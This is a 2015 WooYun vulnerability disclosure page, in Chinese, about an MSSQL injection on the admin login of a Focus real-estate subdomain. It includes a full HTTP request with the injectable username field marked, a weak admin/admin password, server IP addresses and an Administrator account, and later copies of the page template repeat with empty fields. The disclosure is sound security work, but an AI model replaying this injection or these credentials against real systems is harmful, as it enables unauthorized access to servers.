焦点房产某域名MSSQL注入(已登入远程桌面)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118068

漏洞标题：焦点房产某域名MSSQL注入(已登入远程桌面)

漏洞作者： lijiejie

提交时间：2015-06-04 08:37

修复时间：2015-07-19 08:52

公开时间：2015-07-19 08:52

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-04：细节已通知厂商并且等待厂商处理中
2015-06-04：厂商已经确认，细节仅向厂商公开
2015-06-14：细节向核心白帽子及相关领域专家公开
2015-06-24：细节向普通白帽子公开
2015-07-04：细节向实习白帽子公开
2015-07-19：细节向公众公开

简要描述：

焦点房产某域名MSSQL注入,sa,轻松创建帐号远程登入Windows系统。

详细说明：

meijugou.focus.cn后台登录页面的MSSQL注入，sa，可以执行系统命令：

POST /web_admin/login.aspx HTTP/1.1
Host: meijugou.focus.cn
Proxy-Connection: keep-alive
Content-Length: 239
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://meijugou.focus.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://meijugou.focus.cn/web_admin/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: PHPSESSID=5ff020a410401150521fe179ae47c438; sohutag=8HsmeSc5NCwmcyc5NCwmYjc5NCwmYSc5NCwmZjc5NSwmZyc5NCwmbjc5NCwmaSc5NCwmdyc5NCwmaCc5NCwmYyc5NCwmZSc5NCwmbSc5NH0; IPLOC=CN1100; SUV=1506032025433118; __utma=1.790066425.1433334400.1433334400.1433334400.1; __utmb=1.1.10.1433334400; __utmc=1; __utmz=1.1433334400.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=b4y3aydjc5hoscxs0ofbechu
__VIEWSTATE=%2FwEPDwULLTE3MDQ5NjIzMjhkZP1IBl1CCSDOuKtdTEUX%2B61JBUPK%2Bk4NgOP8xFBrmp8p&__EVENTVALIDATION=%2FwEWBAKzh8%2FiCAL3xJvhBALS9cL8AgKRvKPSBajfdDeFZc8S1AnpXdqmVZhyuWpMh%2FB9iDz6o%2Bb%2FYkjg&txt_UserName=test*&txt_Password=1&but_login=

漏洞证明：

此处后台是弱口令 admin / admin
推测是DNS运维失误，还没有删除这个域名，实际解析到别的公司服务器上了。

该机器双IP，但没有内网IP。

IPv4 地址 . . . . . . . . . . . . : 112.65.249.157
   子网掩码  . . . . . . . . . . . . : 255.255.255.128
   IPv4 地址 . . . . . . . . . . . . : 114.80.94.246
   子网掩码  . . . . . . . . . . . . : 255.255.255.128
   默认网关. . . . . . . . . . . . . : 114.80.94.254

抓administrator的密码，发现跟focus好像没什么关系：

* User: Administrator
* Domain: WIN-CT6249O7FLF
* Password: [email protected]

修复方案：

如果是DNS运维失误，则删出DNS记录。
如果是自家的机器，解决SQL注射和弱口令的问题。

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-06-04 08:51

厂商回复：

感谢你对搜狐安全的支持。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118068

漏洞标题：焦点房产某域名MSSQL注入(已登入远程桌面)

相关厂商：焦点房产

漏洞作者： lijiejie

提交时间：2015-06-04 08:37

修复时间：2015-07-19 08:52

公开时间：2015-07-19 08:52

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118068

漏洞标题：焦点房产某域名MSSQL注入(已登入远程桌面)

相关厂商：焦点房产

漏洞作者： lijiejie

提交时间：2015-06-04 08:37

修复时间：2015-07-19 08:52

公开时间：2015-07-19 08:52

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0118068"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：